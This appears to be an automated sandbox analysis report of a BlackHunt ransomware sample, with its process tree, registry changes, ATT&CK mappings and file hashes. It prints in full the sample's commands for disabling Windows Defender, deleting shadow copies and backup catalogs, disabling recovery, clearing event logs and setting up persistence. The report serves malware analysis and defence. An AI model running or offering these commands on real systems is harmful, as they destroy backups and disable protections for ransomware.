0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 52 PID 2824 wrote to memory of 2644 2824 cmd.exe 54 PID 2824 wrote to memory of 2644 2824 cmd.exe 54 PID 2824 wrote to memory of 2644 2824 cmd.exe 54 PID 2224 wrote to memory of 2892 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 55 PID 2224 wrote to memory of 2892 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 55 PID 2224 wrote to memory of 2892 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 55 PID 2224 wrote to memory of 2892 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 55 PID 2224 wrote to memory of 2876 2224 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe"C:\Users\Admin\AppData\Local\Temp\0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1672
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1684
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe" /F2⤵PID:2592
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe" /F3⤵
- Creates scheduled task(s)
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2084
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2104
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2436
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3000
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2596
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2296
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2284
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3008
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:700
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3860
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4032
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3932
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2064
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2716
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3632
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4076
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:908
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3988
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3964
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2072
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2880
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3892
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4044
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1856
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2780
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:300
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2380
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2752
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3124
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0dad26e8ca0c99d5fcb773443570934c7d31bf460ca0bdc4822623e18d03ed7a.exe"2⤵
- Deletes itself
PID:3108 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:636
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:3064
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2740
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2724
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD592a917d26f43f5e72454ec7b9007141c
SHA17fa50ccc0c303d349e09b99683cddef7890df2f5
SHA2564caf1ba670794d8c54605fb5933929fe6ee6d81e3e4bd9829ee970e5672bedec
SHA512fc1da65d483fb5238dee26909df8fbc73c9938dd57783e230609c8c6452fd646e577e98c4d08507f7e72a5ee5244086ceeb23fc6d66400dcbc036b1f2fee63e8
-
Filesize
12KB
MD539a722a9fe26a1390c79e083b5b3eed5
SHA180019f0e9dc0c08d9ae0791eed8cd39bde00f6d1
SHA25656be1ee0f151acf1880e86b040135cb9566736c4d6d8ebcaded3b67247004374
SHA5125a96f7dc874beeecda6e77bfeaa67ffd10d9f7f939dfe01d43ead69e8a1f3fe4eeebae64619c5f677313ead1652e179763525af4e11d18c61b8c91e58f77e65f
-
Filesize
684B
MD5af80a04e22e09de618c95a2a50b8668b
SHA14e5fc96284ae66a4ebd0cd2f4b33f94084708c95
SHA256723fd35ef8e04bc0e18a0dc437d36eb0638923d6c073a28a2bc4de3bf913a786
SHA51289ed5f337ca76b4f4cdbad30960c5c72e716fa4818d6f777b1e8a077957474181b707a379f184defa366c40cd49ebf14b8af00e99d8c65d74b685d876aa7f0e0